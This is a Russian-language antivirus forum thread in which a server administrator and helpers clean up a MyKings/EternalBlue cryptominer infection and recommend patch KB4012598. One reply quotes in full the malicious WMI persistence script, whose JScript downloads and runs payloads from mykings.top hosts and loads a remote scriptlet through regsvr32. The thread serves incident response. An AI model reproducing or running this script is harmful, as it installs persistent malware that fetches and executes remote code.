[ Закрыто ] Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа; , ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER

RSS
Как видим, троян и процессы, её запускающие, не удаляются. В планировщике появилось 2 новых задания. В автозапуске 2 новых процесса. Как понял, троян появился только-только. Первые упоминания с 1 июня в сети. НОД пока что только обнаруживает и удаляет создаваемый исполняемый файл.

WinServ2003, NOD32 File Security

Скрытый текст

Ответы

Работают люди :)  ;)
Изменено: RP55 RP55 - 09.06.2017 19:38:34
Андрей Пахомов,
вам необходимо пропатчить систему, чтобы после ее очистки она опять же не подверглась атаке

Цитата
Требуется установка обновления KB4012598, если у вас следующие операционные системы:

   Windows 8, Windows XP SP3, Windows XP SP2 64-bit, Windows Server 2008 for Itanium-based Systems, Windows Vista, Windows Server 2008, Windows XP Embedded, Windows Server 2003, Windows Server 2003 Datacenter Edition.

https://www.comss.ru/download/page.php?id=4016

для вашей системы

Microsoft Windows Server 2003 R2 x86 (NT v5.2 SP2) build 3790 Service Pack 2 [C:\WINDOWS]

патч MS-2017-010 скачать отсюда:

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Политики, задания и пр. поудалял.
Проверяю сейчас антимэйлваром.
Файл архивировать и отправлять пока не буду,
Нод успешно его на подлёте сносит.
Винду пропатчил, буду наблюдать.
Спасибо всем за помощь!  
скрипт в uVS выполнили?

файл c2.bat как раз нам интересен, потому что в образ он (список команд бат файла) попадает не полностью.
Нет, не выполнил. Т.к. смогу это сделать только ночью, когда все будут отключены от сервера.
Файл тоже постараюсь сегодня поймать.  
скрипт надо выполнить обязательно, потому что он очищает левый обработчик событий WMI.

этот обработчик и добавляет вам в систему вредоносные файлы из сети, которые пока гасятся антивирусом.

Цитата
Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name fuckyoumm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name fuckyoumm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "fuckyoumm2_filter";
Query = "select * from __timerevent where timerid="fuckyoumm2_itimer"";
QueryLanguage = "wql";
};

через этот обработчик выполняется попытка установить в систему майнер криптовалюты.
Цитата
santy написал:
файл c2.bat как раз нам интересен

Вчера подобный файл внесли в базу как угрозу... :)
Читают тему (гостей: 2)